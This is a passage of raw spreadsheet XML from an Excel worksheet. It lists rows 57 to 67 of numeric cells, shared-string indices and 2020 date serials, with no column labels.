      <c r="C57" t="s">
        <v>157</v>
      </c>
      <c r="D57" t="s">
        <v>561</v>
      </c>
      <c r="E57" t="s">
        <v>142</v>
      </c>
      <c r="F57" t="s">
        <v>562</v>
      </c>
      <c r="G57" s="1">
        <v>43921</v>
      </c>
      <c r="H57">
        <v>1771</v>
      </c>
      <c r="I57">
        <v>1771</v>
      </c>
      <c r="J57">
        <v>4</v>
      </c>
      <c r="K57">
        <v>0</v>
      </c>
      <c r="L57">
        <v>0</v>
      </c>
      <c r="M57">
        <v>0</v>
      </c>
      <c r="N57">
        <v>2250</v>
      </c>
      <c r="O57">
        <v>0</v>
      </c>
      <c r="P57">
        <v>0</v>
      </c>
      <c r="Q57">
        <v>4</v>
      </c>
      <c r="R57">
        <v>0</v>
      </c>
      <c r="S57">
        <v>0</v>
      </c>
      <c r="T57">
        <v>0</v>
      </c>
      <c r="U57">
        <v>5000000</v>
      </c>
      <c r="V57">
        <v>0</v>
      </c>
      <c r="W57">
        <v>0</v>
      </c>
      <c r="X57">
        <v>0</v>
      </c>
      <c r="Y57">
        <v>0</v>
      </c>
      <c r="Z57">
        <v>0</v>
      </c>
      <c r="AA57">
        <v>0</v>
      </c>
      <c r="AB57">
        <v>600</v>
      </c>
      <c r="AC57">
        <v>0</v>
      </c>
      <c r="AD57">
        <v>0</v>
      </c>
      <c r="AE57">
        <v>0</v>
      </c>
      <c r="AF57" t="s">
        <v>563</v>
      </c>
      <c r="AG57">
        <v>68362</v>
      </c>
      <c r="AH57">
        <v>16</v>
      </c>
      <c r="AJ57">
        <v>239</v>
      </c>
      <c r="AK57" t="s">
        <v>564</v>
      </c>
      <c r="AL57" t="s">
        <v>565</v>
      </c>
      <c r="AM57" t="s">
        <v>566</v>
      </c>
      <c r="AN57" t="s">
        <v>55</v>
      </c>
      <c r="AO57">
        <v>2018</v>
      </c>
      <c r="AP57" t="s">
        <v>567</v>
      </c>
      <c r="AQ57" t="s">
        <v>568</v>
      </c>
      <c r="AR57" t="s">
        <v>569</v>
      </c>
      <c r="AS57" t="s">
        <v>71</v>
      </c>
      <c r="AT57" t="s">
        <v>58</v>
      </c>
      <c r="AU57">
        <v>25</v>
      </c>
      <c r="AV57">
        <v>1</v>
      </c>
      <c r="AW57">
        <v>147</v>
      </c>
      <c r="AX57">
        <v>384</v>
      </c>
      <c r="AY57">
        <v>26</v>
      </c>
      <c r="AZ57">
        <v>41</v>
      </c>
      <c r="BA57" t="s">
        <v>17241</v>
      </c>
      <c r="BB57" t="s">
        <v>14577</v>
      </c>
      <c r="BC57">
        <v>0</v>
      </c>
      <c r="BD57" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="58" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A58">
        <v>346</v>
      </c>
      <c r="B58" t="s">
        <v>570</v>
      </c>
      <c r="C58" t="s">
        <v>168</v>
      </c>
      <c r="D58" t="s">
        <v>571</v>
      </c>
      <c r="E58" t="s">
        <v>412</v>
      </c>
      <c r="F58" t="s">
        <v>572</v>
      </c>
      <c r="G58" s="1">
        <v>43937</v>
      </c>
      <c r="H58">
        <v>1797</v>
      </c>
      <c r="I58">
        <v>1797</v>
      </c>
      <c r="J58">
        <v>2</v>
      </c>
      <c r="K58">
        <v>1</v>
      </c>
      <c r="L58">
        <v>1</v>
      </c>
      <c r="M58">
        <v>5</v>
      </c>
      <c r="N58">
        <v>1000</v>
      </c>
      <c r="O58">
        <v>0</v>
      </c>
      <c r="P58">
        <v>0</v>
      </c>
      <c r="Q58">
        <v>0</v>
      </c>
      <c r="R58">
        <v>0</v>
      </c>
      <c r="S58">
        <v>0</v>
      </c>
      <c r="T58">
        <v>1</v>
      </c>
      <c r="U58">
        <v>400000</v>
      </c>
      <c r="V58">
        <v>5000</v>
      </c>
      <c r="W58">
        <v>5000</v>
      </c>
      <c r="X58">
        <v>6250</v>
      </c>
      <c r="Y58">
        <v>0</v>
      </c>
      <c r="Z58">
        <v>0</v>
      </c>
      <c r="AA58">
        <v>0</v>
      </c>
      <c r="AB58">
        <v>0</v>
      </c>
      <c r="AC58">
        <v>0</v>
      </c>
      <c r="AD58">
        <v>0</v>
      </c>
      <c r="AE58">
        <v>3000</v>
      </c>
      <c r="AF58" t="s">
        <v>573</v>
      </c>
      <c r="AG58">
        <v>45254</v>
      </c>
      <c r="AH58">
        <v>13</v>
      </c>
      <c r="AJ58">
        <v>172</v>
      </c>
      <c r="AK58" t="s">
        <v>574</v>
      </c>
      <c r="AL58" t="s">
        <v>575</v>
      </c>
      <c r="AM58" t="s">
        <v>576</v>
      </c>
      <c r="AN58" t="s">
        <v>82</v>
      </c>
      <c r="AO58">
        <v>2013</v>
      </c>
      <c r="AP58">
        <v>2345614333</v>
      </c>
      <c r="AQ58" t="s">
        <v>577</v>
      </c>
      <c r="AR58" t="s">
        <v>573</v>
      </c>
      <c r="AU58">
        <v>25</v>
      </c>
      <c r="AV58">
        <v>2</v>
      </c>
      <c r="AW58">
        <v>285</v>
      </c>
      <c r="AX58">
        <v>367</v>
      </c>
      <c r="AY58">
        <v>110</v>
      </c>
      <c r="AZ58">
        <v>32</v>
      </c>
      <c r="BA58" t="s">
        <v>16668</v>
      </c>
      <c r="BB58" t="s">
        <v>14498</v>
      </c>
      <c r="BC58">
        <v>0</v>
      </c>
      <c r="BD58" t="s">
        <v>10075</v>
      </c>
    </row>
    <row r="59" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A59">
        <v>492</v>
      </c>
      <c r="B59" t="s">
        <v>578</v>
      </c>
      <c r="C59" t="s">
        <v>579</v>
      </c>
      <c r="D59" t="s">
        <v>580</v>
      </c>
      <c r="E59" t="s">
        <v>49</v>
      </c>
      <c r="F59" t="s">
        <v>581</v>
      </c>
      <c r="G59" s="1">
        <v>43892</v>
      </c>
      <c r="H59">
        <v>1864</v>
      </c>
      <c r="I59">
        <v>1864</v>
      </c>
      <c r="J59">
        <v>1</v>
      </c>
      <c r="K59">
        <v>0</v>
      </c>
      <c r="L59">
        <v>0</v>
      </c>
      <c r="M59">
        <v>0</v>
      </c>
      <c r="N59">
        <v>0</v>
      </c>
      <c r="O59">
        <v>0</v>
      </c>
      <c r="P59">
        <v>0</v>
      </c>
      <c r="Q59">
        <v>1</v>
      </c>
      <c r="R59">
        <v>1</v>
      </c>
      <c r="S59">
        <v>0</v>
      </c>
      <c r="T59">
        <v>1</v>
      </c>
      <c r="U59">
        <v>3000</v>
      </c>
      <c r="V59">
        <v>0</v>
      </c>
      <c r="W59">
        <v>0</v>
      </c>
      <c r="X59">
        <v>0</v>
      </c>
      <c r="Y59">
        <v>0</v>
      </c>
      <c r="Z59">
        <v>0</v>
      </c>
      <c r="AA59">
        <v>0</v>
      </c>
      <c r="AB59">
        <v>300</v>
      </c>
      <c r="AC59">
        <v>2000</v>
      </c>
      <c r="AD59">
        <v>0</v>
      </c>
      <c r="AE59">
        <v>9000</v>
      </c>
      <c r="AF59" t="s">
        <v>582</v>
      </c>
      <c r="AG59">
        <v>76116</v>
      </c>
      <c r="AH59">
        <v>23</v>
      </c>
      <c r="AJ59">
        <v>363</v>
      </c>
      <c r="AK59" t="s">
        <v>583</v>
      </c>
      <c r="AL59" t="s">
        <v>584</v>
      </c>
      <c r="AM59" t="s">
        <v>585</v>
      </c>
      <c r="AN59" t="s">
        <v>68</v>
      </c>
      <c r="AO59">
        <v>2006</v>
      </c>
      <c r="AP59" t="s">
        <v>586</v>
      </c>
      <c r="AQ59" t="s">
        <v>587</v>
      </c>
      <c r="AR59" t="s">
        <v>582</v>
      </c>
      <c r="AS59" t="s">
        <v>71</v>
      </c>
      <c r="AT59" t="s">
        <v>72</v>
      </c>
      <c r="AU59">
        <v>26</v>
      </c>
      <c r="AV59">
        <v>1</v>
      </c>
      <c r="AW59">
        <v>2</v>
      </c>
      <c r="AX59">
        <v>20</v>
      </c>
      <c r="AY59">
        <v>1</v>
      </c>
      <c r="AZ59">
        <v>20</v>
      </c>
      <c r="BA59" t="s">
        <v>17243</v>
      </c>
      <c r="BB59" t="s">
        <v>14618</v>
      </c>
      <c r="BC59" t="s">
        <v>10345</v>
      </c>
      <c r="BD59" t="s">
        <v>9949</v>
      </c>
    </row>
    <row r="60" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A60">
        <v>674</v>
      </c>
      <c r="B60" t="s">
        <v>588</v>
      </c>
      <c r="C60" t="s">
        <v>88</v>
      </c>
      <c r="D60" t="s">
        <v>589</v>
      </c>
      <c r="E60" t="s">
        <v>111</v>
      </c>
      <c r="F60" t="s">
        <v>590</v>
      </c>
      <c r="G60" s="1">
        <v>43913</v>
      </c>
      <c r="H60">
        <v>1867</v>
      </c>
      <c r="I60">
        <v>1867</v>
      </c>
      <c r="J60">
        <v>2</v>
      </c>
      <c r="K60">
        <v>1</v>
      </c>
      <c r="L60">
        <v>2</v>
      </c>
      <c r="M60">
        <v>0</v>
      </c>
      <c r="N60">
        <v>0</v>
      </c>
      <c r="O60">
        <v>0</v>
      </c>
      <c r="P60">
        <v>0</v>
      </c>
      <c r="Q60">
        <v>0</v>
      </c>
      <c r="R60">
        <v>0</v>
      </c>
      <c r="S60">
        <v>1</v>
      </c>
      <c r="T60">
        <v>0</v>
      </c>
      <c r="U60">
        <v>50000</v>
      </c>
      <c r="V60">
        <v>20000</v>
      </c>
      <c r="W60">
        <v>3000</v>
      </c>
      <c r="X60">
        <v>0</v>
      </c>
      <c r="Y60">
        <v>0</v>
      </c>
      <c r="Z60">
        <v>0</v>
      </c>
      <c r="AA60">
        <v>0</v>
      </c>
      <c r="AB60">
        <v>0</v>
      </c>
      <c r="AC60">
        <v>0</v>
      </c>
      <c r="AD60">
        <v>1</v>
      </c>
      <c r="AE60">
        <v>0</v>
      </c>
      <c r="AF60" t="s">
        <v>591</v>
      </c>
      <c r="AG60">
        <v>80223</v>
      </c>
      <c r="AH60">
        <v>17</v>
      </c>
      <c r="AJ60">
        <v>282</v>
      </c>
      <c r="AK60" t="s">
        <v>592</v>
      </c>
      <c r="AL60" t="s">
        <v>593</v>
      </c>
      <c r="AM60" t="s">
        <v>594</v>
      </c>
      <c r="AN60" t="s">
        <v>82</v>
      </c>
      <c r="AO60">
        <v>2009</v>
      </c>
      <c r="AP60" t="s">
        <v>595</v>
      </c>
      <c r="AQ60" t="s">
        <v>596</v>
      </c>
      <c r="AR60" t="s">
        <v>597</v>
      </c>
      <c r="AU60">
        <v>26</v>
      </c>
      <c r="AV60">
        <v>1</v>
      </c>
      <c r="AW60">
        <v>0</v>
      </c>
      <c r="AX60">
        <v>0</v>
      </c>
      <c r="AY60">
        <v>39</v>
      </c>
      <c r="AZ60">
        <v>91</v>
      </c>
      <c r="BA60" t="s">
        <v>17240</v>
      </c>
      <c r="BB60" t="s">
        <v>14766</v>
      </c>
      <c r="BC60">
        <v>0</v>
      </c>
      <c r="BD60" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="61" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A61">
        <v>27</v>
      </c>
      <c r="B61" t="s">
        <v>598</v>
      </c>
      <c r="C61" t="s">
        <v>88</v>
      </c>
      <c r="D61" t="s">
        <v>599</v>
      </c>
      <c r="E61" t="s">
        <v>300</v>
      </c>
      <c r="F61" t="s">
        <v>600</v>
      </c>
      <c r="G61" s="1">
        <v>43942</v>
      </c>
      <c r="H61">
        <v>1874</v>
      </c>
      <c r="I61">
        <v>1874</v>
      </c>
      <c r="J61">
        <v>1</v>
      </c>
      <c r="K61">
        <v>2</v>
      </c>
      <c r="L61">
        <v>1</v>
      </c>
      <c r="M61">
        <v>0</v>
      </c>
      <c r="N61">
        <v>0</v>
      </c>
      <c r="O61">
        <v>0</v>
      </c>
      <c r="P61">
        <v>0</v>
      </c>
      <c r="Q61">
        <v>0</v>
      </c>
      <c r="R61">
        <v>0</v>
      </c>
      <c r="S61">
        <v>0</v>
      </c>
      <c r="T61">
        <v>0</v>
      </c>
      <c r="U61">
        <v>300</v>
      </c>
      <c r="V61">
        <v>4000</v>
      </c>
      <c r="W61">
        <v>3000</v>
      </c>
      <c r="X61">
        <v>0</v>
      </c>
      <c r="Y61">
        <v>0</v>
      </c>
      <c r="Z61">
        <v>0</v>
      </c>
      <c r="AA61">
        <v>0</v>
      </c>
      <c r="AB61">
        <v>0</v>
      </c>
      <c r="AC61">
        <v>0</v>
      </c>
      <c r="AD61">
        <v>0</v>
      </c>
      <c r="AE61">
        <v>0</v>
      </c>
      <c r="AF61" t="s">
        <v>601</v>
      </c>
      <c r="AG61">
        <v>8022</v>
      </c>
      <c r="AH61">
        <v>17</v>
      </c>
      <c r="AJ61">
        <v>282</v>
      </c>
      <c r="AK61" t="s">
        <v>592</v>
      </c>
      <c r="AL61" t="s">
        <v>602</v>
      </c>
      <c r="AM61" t="s">
        <v>603</v>
      </c>
      <c r="AN61" t="s">
        <v>55</v>
      </c>
      <c r="AO61">
        <v>2004</v>
      </c>
      <c r="AP61">
        <v>361725695</v>
      </c>
      <c r="AQ61" t="s">
        <v>604</v>
      </c>
      <c r="AR61" t="s">
        <v>605</v>
      </c>
      <c r="AU61">
        <v>0</v>
      </c>
      <c r="AV61">
        <v>0</v>
      </c>
      <c r="AW61">
        <v>0</v>
      </c>
      <c r="AX61">
        <v>0</v>
      </c>
      <c r="AY61">
        <v>58</v>
      </c>
      <c r="AZ61">
        <v>36</v>
      </c>
      <c r="BA61" t="s">
        <v>17244</v>
      </c>
      <c r="BB61" t="s">
        <v>14231</v>
      </c>
      <c r="BC61">
        <v>0</v>
      </c>
      <c r="BD61" t="s">
        <v>10570</v>
      </c>
    </row>
    <row r="62" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A62">
        <v>561</v>
      </c>
      <c r="B62" t="s">
        <v>606</v>
      </c>
      <c r="C62" t="s">
        <v>607</v>
      </c>
      <c r="D62" t="s">
        <v>608</v>
      </c>
      <c r="E62" t="s">
        <v>142</v>
      </c>
      <c r="F62" t="s">
        <v>609</v>
      </c>
      <c r="G62" s="1">
        <v>43949</v>
      </c>
      <c r="H62">
        <v>1891</v>
      </c>
      <c r="I62">
        <v>1891</v>
      </c>
      <c r="J62">
        <v>0</v>
      </c>
      <c r="K62">
        <v>2</v>
      </c>
      <c r="L62">
        <v>4</v>
      </c>
      <c r="M62">
        <v>0</v>
      </c>
      <c r="N62">
        <v>0</v>
      </c>
      <c r="O62">
        <v>0</v>
      </c>
      <c r="P62">
        <v>0</v>
      </c>
      <c r="Q62">
        <v>2</v>
      </c>
      <c r="R62">
        <v>0</v>
      </c>
      <c r="S62">
        <v>0</v>
      </c>
      <c r="T62">
        <v>0</v>
      </c>
      <c r="U62">
        <v>0</v>
      </c>
      <c r="V62">
        <v>120000</v>
      </c>
      <c r="W62">
        <v>3500</v>
      </c>
      <c r="X62">
        <v>0</v>
      </c>
      <c r="Y62">
        <v>0</v>
      </c>
      <c r="Z62">
        <v>0</v>
      </c>
      <c r="AA62">
        <v>0</v>
      </c>
      <c r="AB62">
        <v>100</v>
      </c>
      <c r="AC62">
        <v>0</v>
      </c>
      <c r="AD62">
        <v>0</v>
      </c>
      <c r="AE62">
        <v>0</v>
      </c>
      <c r="AF62" t="s">
        <v>610</v>
      </c>
      <c r="AG62">
        <v>77116</v>
      </c>
      <c r="AH62">
        <v>24</v>
      </c>
      <c r="AJ62">
        <v>370</v>
      </c>
      <c r="AK62" t="s">
        <v>611</v>
      </c>
      <c r="AL62" t="s">
        <v>612</v>
      </c>
      <c r="AM62" t="s">
        <v>613</v>
      </c>
      <c r="AN62" t="s">
        <v>55</v>
      </c>
      <c r="AO62">
        <v>2010</v>
      </c>
      <c r="AP62">
        <v>82214811439</v>
      </c>
      <c r="AQ62" t="s">
        <v>614</v>
      </c>
      <c r="AR62" t="s">
        <v>615</v>
      </c>
      <c r="AS62" t="s">
        <v>71</v>
      </c>
      <c r="AT62" t="s">
        <v>58</v>
      </c>
      <c r="AU62">
        <v>51</v>
      </c>
      <c r="AV62">
        <v>0</v>
      </c>
      <c r="AW62">
        <v>10</v>
      </c>
      <c r="AX62">
        <v>16</v>
      </c>
      <c r="AY62">
        <v>10</v>
      </c>
      <c r="AZ62">
        <v>5</v>
      </c>
      <c r="BA62" t="s">
        <v>17250</v>
      </c>
      <c r="BB62" t="s">
        <v>14675</v>
      </c>
      <c r="BC62" t="s">
        <v>9550</v>
      </c>
      <c r="BD62">
        <v>0</v>
      </c>
    </row>
    <row r="63" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A63">
        <v>650</v>
      </c>
      <c r="B63" t="s">
        <v>616</v>
      </c>
      <c r="C63" t="s">
        <v>129</v>
      </c>
      <c r="D63" t="s">
        <v>617</v>
      </c>
      <c r="E63" t="s">
        <v>49</v>
      </c>
      <c r="F63" t="s">
        <v>618</v>
      </c>
      <c r="G63" s="1">
        <v>44110</v>
      </c>
      <c r="H63">
        <v>1916</v>
      </c>
      <c r="I63">
        <v>1916</v>
      </c>
      <c r="J63">
        <v>0</v>
      </c>
      <c r="K63">
        <v>0</v>
      </c>
      <c r="L63">
        <v>0</v>
      </c>
      <c r="M63">
        <v>0</v>
      </c>
      <c r="N63">
        <v>0</v>
      </c>
      <c r="O63">
        <v>0</v>
      </c>
      <c r="P63">
        <v>0</v>
      </c>
      <c r="Q63">
        <v>1</v>
      </c>
      <c r="R63">
        <v>9</v>
      </c>
      <c r="S63">
        <v>0</v>
      </c>
      <c r="T63">
        <v>0</v>
      </c>
      <c r="U63">
        <v>0</v>
      </c>
      <c r="V63">
        <v>0</v>
      </c>
      <c r="W63">
        <v>0</v>
      </c>
      <c r="X63">
        <v>0</v>
      </c>
      <c r="Y63">
        <v>0</v>
      </c>
      <c r="Z63">
        <v>0</v>
      </c>
      <c r="AA63">
        <v>0</v>
      </c>
      <c r="AB63">
        <v>50</v>
      </c>
      <c r="AC63">
        <v>2000</v>
      </c>
      <c r="AD63">
        <v>0</v>
      </c>
      <c r="AE63">
        <v>0</v>
      </c>
      <c r="AF63" t="s">
        <v>619</v>
      </c>
      <c r="AG63">
        <v>15127</v>
      </c>
      <c r="AH63">
        <v>11</v>
      </c>
      <c r="AJ63">
        <v>270</v>
      </c>
      <c r="AK63" t="s">
        <v>620</v>
      </c>
      <c r="AL63" t="s">
        <v>621</v>
      </c>
      <c r="AM63" t="s">
        <v>622</v>
      </c>
      <c r="AN63" t="s">
        <v>68</v>
      </c>
      <c r="AO63">
        <v>2016</v>
      </c>
      <c r="AP63">
        <v>2155910581</v>
      </c>
      <c r="AQ63" t="s">
        <v>623</v>
      </c>
      <c r="AR63" t="s">
        <v>624</v>
      </c>
      <c r="AS63" t="s">
        <v>71</v>
      </c>
      <c r="AT63" t="s">
        <v>72</v>
      </c>
      <c r="AU63">
        <v>24</v>
      </c>
      <c r="AV63">
        <v>2</v>
      </c>
      <c r="AW63">
        <v>0</v>
      </c>
      <c r="AX63">
        <v>0</v>
      </c>
      <c r="AY63">
        <v>6</v>
      </c>
      <c r="AZ63">
        <v>2</v>
      </c>
      <c r="BA63" t="s">
        <v>16729</v>
      </c>
      <c r="BB63" t="s">
        <v>14751</v>
      </c>
      <c r="BC63" t="s">
        <v>10546</v>
      </c>
      <c r="BD63" t="s">
        <v>9551</v>
      </c>
    </row>
    <row r="64" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A64">
        <v>500</v>
      </c>
      <c r="B64" t="s">
        <v>625</v>
      </c>
      <c r="C64" t="s">
        <v>129</v>
      </c>
      <c r="D64" t="s">
        <v>626</v>
      </c>
      <c r="E64" t="s">
        <v>627</v>
      </c>
      <c r="F64" t="s">
        <v>628</v>
      </c>
      <c r="G64" s="1">
        <v>43942</v>
      </c>
      <c r="H64">
        <v>1927</v>
      </c>
      <c r="I64">
        <v>1927</v>
      </c>
      <c r="J64">
        <v>1</v>
      </c>
      <c r="K64">
        <v>1</v>
      </c>
      <c r="L64">
        <v>0</v>
      </c>
      <c r="M64">
        <v>0</v>
      </c>
      <c r="N64">
        <v>0</v>
      </c>
      <c r="O64">
        <v>0</v>
      </c>
      <c r="P64">
        <v>0</v>
      </c>
      <c r="Q64">
        <v>2</v>
      </c>
      <c r="R64">
        <v>8</v>
      </c>
      <c r="S64">
        <v>0</v>
      </c>
      <c r="T64">
        <v>1</v>
      </c>
      <c r="U64">
        <v>6000</v>
      </c>
      <c r="V64">
        <v>6000</v>
      </c>
      <c r="W64">
        <v>0</v>
      </c>
      <c r="X64">
        <v>0</v>
      </c>
      <c r="Y64">
        <v>0</v>
      </c>
      <c r="Z64">
        <v>0</v>
      </c>
      <c r="AA64">
        <v>0</v>
      </c>
      <c r="AB64">
        <v>1000</v>
      </c>
      <c r="AC64">
        <v>6000</v>
      </c>
      <c r="AD64">
        <v>0</v>
      </c>
      <c r="AE64">
        <v>3000</v>
      </c>
      <c r="AF64" t="s">
        <v>629</v>
      </c>
      <c r="AG64">
        <v>15127</v>
      </c>
      <c r="AH64">
        <v>11</v>
      </c>
      <c r="AJ64">
        <v>270</v>
      </c>
      <c r="AK64" t="s">
        <v>620</v>
      </c>
      <c r="AL64" t="s">
        <v>630</v>
      </c>
      <c r="AM64" t="s">
        <v>631</v>
      </c>
      <c r="AN64" t="s">
        <v>55</v>
      </c>
      <c r="AO64">
        <v>2012</v>
      </c>
      <c r="AP64" t="s">
        <v>632</v>
      </c>
      <c r="AQ64" t="s">
        <v>633</v>
      </c>
      <c r="AR64" t="s">
        <v>629</v>
      </c>
      <c r="AS64" t="s">
        <v>57</v>
      </c>
      <c r="AT64" t="s">
        <v>58</v>
      </c>
      <c r="AU64">
        <v>26</v>
      </c>
      <c r="AV64">
        <v>0</v>
      </c>
      <c r="AW64">
        <v>0</v>
      </c>
      <c r="AX64">
        <v>0</v>
      </c>
      <c r="AY64">
        <v>13</v>
      </c>
      <c r="AZ64">
        <v>0</v>
      </c>
      <c r="BA64">
        <v>0</v>
      </c>
      <c r="BB64" t="s">
        <v>14624</v>
      </c>
      <c r="BC64">
        <v>0</v>
      </c>
      <c r="BD64" t="s">
        <v>11145</v>
      </c>
    </row>
    <row r="65" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A65">
        <v>337</v>
      </c>
      <c r="B65" t="s">
        <v>634</v>
      </c>
      <c r="C65" t="s">
        <v>168</v>
      </c>
      <c r="D65" t="s">
        <v>635</v>
      </c>
      <c r="E65" t="s">
        <v>142</v>
      </c>
      <c r="F65" t="s">
        <v>143</v>
      </c>
      <c r="G65" s="1">
        <v>43991</v>
      </c>
      <c r="H65">
        <v>1943</v>
      </c>
      <c r="I65">
        <v>1943</v>
      </c>
      <c r="J65">
        <v>3</v>
      </c>
      <c r="K65">
        <v>0</v>
      </c>
      <c r="L65">
        <v>1</v>
      </c>
      <c r="M65">
        <v>6</v>
      </c>
      <c r="N65">
        <v>0</v>
      </c>
      <c r="O65">
        <v>0</v>
      </c>
      <c r="P65">
        <v>2</v>
      </c>
      <c r="Q65">
        <v>2</v>
      </c>
      <c r="R65">
        <v>4</v>
      </c>
      <c r="S65">
        <v>0</v>
      </c>
      <c r="T65">
        <v>3</v>
      </c>
      <c r="U65">
        <v>25</v>
      </c>
      <c r="V65">
        <v>0</v>
      </c>
      <c r="W65">
        <v>3500</v>
      </c>
      <c r="X65">
        <v>3600</v>
      </c>
      <c r="Y65">
        <v>0</v>
      </c>
      <c r="Z65">
        <v>0</v>
      </c>
      <c r="AA65">
        <v>4</v>
      </c>
      <c r="AB65">
        <v>4000</v>
      </c>
      <c r="AC65">
        <v>2000</v>
      </c>
      <c r="AD65">
        <v>0</v>
      </c>
      <c r="AE65">
        <v>45000</v>
      </c>
      <c r="AF65" t="s">
        <v>636</v>
      </c>
      <c r="AG65">
        <v>16526</v>
      </c>
      <c r="AH65">
        <v>13</v>
      </c>
      <c r="AJ65">
        <v>184</v>
      </c>
      <c r="AK65" t="s">
        <v>637</v>
      </c>
      <c r="AL65" t="s">
        <v>638</v>
      </c>
      <c r="AM65" t="s">
        <v>639</v>
      </c>
      <c r="AN65" t="s">
        <v>55</v>
      </c>
      <c r="AO65">
        <v>2009</v>
      </c>
      <c r="AP65">
        <v>8121813090</v>
      </c>
      <c r="AQ65" t="s">
        <v>640</v>
      </c>
      <c r="AR65" t="s">
        <v>641</v>
      </c>
      <c r="AS65" t="s">
        <v>71</v>
      </c>
      <c r="AT65" t="s">
        <v>58</v>
      </c>
      <c r="AU65">
        <v>24</v>
      </c>
      <c r="AV65">
        <v>1</v>
      </c>
      <c r="AW65">
        <v>54</v>
      </c>
      <c r="AX65">
        <v>70</v>
      </c>
      <c r="AY65">
        <v>27</v>
      </c>
      <c r="AZ65">
        <v>8</v>
      </c>
      <c r="BA65">
        <v>0</v>
      </c>
      <c r="BB65" t="s">
        <v>14492</v>
      </c>
      <c r="BC65" t="s">
        <v>10374</v>
      </c>
      <c r="BD65">
        <v>0</v>
      </c>
    </row>
    <row r="66" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A66">
        <v>633</v>
      </c>
      <c r="B66" t="s">
        <v>642</v>
      </c>
      <c r="C66" t="s">
        <v>318</v>
      </c>
      <c r="D66" t="s">
        <v>643</v>
      </c>
      <c r="E66" t="s">
        <v>644</v>
      </c>
      <c r="F66" t="s">
        <v>645</v>
      </c>
      <c r="G66" s="1">
        <v>43920</v>
      </c>
      <c r="H66">
        <v>1950</v>
      </c>
      <c r="I66">
        <v>1950</v>
      </c>
      <c r="J66">
        <v>0</v>
      </c>
      <c r="K66">
        <v>0</v>
      </c>
      <c r="L66">
        <v>0</v>
      </c>
      <c r="M66">
        <v>0</v>
      </c>
      <c r="N66">
        <v>0</v>
      </c>
      <c r="O66">
        <v>0</v>
      </c>
      <c r="P66">
        <v>0</v>
      </c>
      <c r="Q66">
        <v>2</v>
      </c>
      <c r="R66">
        <v>2</v>
      </c>
      <c r="S66">
        <v>0</v>
      </c>
      <c r="T66">
        <v>0</v>
      </c>
      <c r="U66">
        <v>0</v>
      </c>
      <c r="V66">
        <v>0</v>
      </c>
      <c r="W66">
        <v>0</v>
      </c>
      <c r="X66">
        <v>0</v>
      </c>
      <c r="Y66">
        <v>0</v>
      </c>
      <c r="Z66">
        <v>0</v>
      </c>
      <c r="AA66">
        <v>0</v>
      </c>
      <c r="AB66">
        <v>500</v>
      </c>
      <c r="AC66">
        <v>500</v>
      </c>
      <c r="AD66">
        <v>0</v>
      </c>
      <c r="AE66">
        <v>0</v>
      </c>
      <c r="AF66" t="s">
        <v>646</v>
      </c>
      <c r="AG66">
        <v>90552</v>
      </c>
      <c r="AH66">
        <v>26</v>
      </c>
      <c r="AJ66">
        <v>406</v>
      </c>
      <c r="AK66" t="s">
        <v>647</v>
      </c>
      <c r="AL66" t="s">
        <v>648</v>
      </c>
      <c r="AM66" t="s">
        <v>649</v>
      </c>
      <c r="AN66" t="s">
        <v>68</v>
      </c>
      <c r="AO66">
        <v>2017</v>
      </c>
      <c r="AP66">
        <v>82147422002</v>
      </c>
      <c r="AQ66" t="s">
        <v>650</v>
      </c>
      <c r="AR66" t="s">
        <v>646</v>
      </c>
      <c r="AS66" t="s">
        <v>57</v>
      </c>
      <c r="AT66" t="s">
        <v>58</v>
      </c>
      <c r="AU66">
        <v>0</v>
      </c>
      <c r="AV66">
        <v>0</v>
      </c>
      <c r="AW66">
        <v>0</v>
      </c>
      <c r="AX66">
        <v>0</v>
      </c>
      <c r="AY66">
        <v>8</v>
      </c>
      <c r="AZ66">
        <v>3</v>
      </c>
      <c r="BA66" t="s">
        <v>17254</v>
      </c>
      <c r="BB66" t="s">
        <v>14737</v>
      </c>
      <c r="BC66" t="s">
        <v>10381</v>
      </c>
      <c r="BD66" t="s">
        <v>10379</v>
      </c>
    </row>
    <row r="67" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A67">
        <v>305</v>
      </c>
      <c r="B67" t="s">
        <v>651</v>
      </c>
      <c r="C67" t="s">
        <v>99</v>
      </c>
      <c r="D67" t="s">
        <v>652</v>
      </c>
      <c r="E67" t="s">
        <v>363</v>
      </c>
      <c r="F67" t="s">
        <v>653</v>
      </c>
      <c r="G67" s="1">
        <v>44021</v>
      </c>
      <c r="H67">
        <v>1969</v>
      </c>
      <c r="I67">
        <v>1969</v>
      </c>
      <c r="J67">
        <v>0</v>
      </c>
      <c r="K67">
        <v>0</v>
      </c>
      <c r="L67">
        <v>0</v>
      </c>
      <c r="M67">
        <v>0</v>
      </c>
      <c r="N67">
        <v>0</v>
      </c>
      <c r="O67">
        <v>0</v>
      </c>
      <c r="P67">
        <v>0</v>
      </c>
      <c r="Q67">
        <v>0</v>
      </c>
      <c r="R67">
        <v>0</v>
      </c>
      <c r="S67">
        <v>1</v>
      </c>
      <c r="T67">
        <v>1</v>
      </c>
      <c r="U67">
        <v>0</v>
      </c>
      <c r="V67">
        <v>0</v>
      </c>
      <c r="W67">
        <v>0</v>
      </c>
      <c r="X67">
        <v>0</v>
      </c>
      <c r="Y67">
        <v>0</v>
      </c>
      <c r="Z67">
        <v>0</v>
      </c>
      <c r="AA67">
        <v>0</v>
      </c>
      <c r="AB67">
        <v>0</v>
      </c>
      <c r="AC67">
        <v>0</v>
      </c>
      <c r="AD67">
        <v>1</v>
      </c>
      <c r="AE67">
        <v>20000</v>
      </c>
      <c r="AF67" t="s">
        <v>654</v>
      </c>
      <c r="AG67">
        <v>11110</v>
      </c>
      <c r="AH67">
        <v>12</v>
      </c>
      <c r="AJ67">
        <v>160</v>
      </c>
      <c r="AK67" t="s">
        <v>114</v>
      </c>
      <c r="AL67" t="s">
        <v>114</v>
      </c>
      <c r="AM67" t="s">
        <v>655</v>
      </c>
      <c r="AN67" t="s">
        <v>55</v>
      </c>
      <c r="AO67">
        <v>2008</v>
      </c>
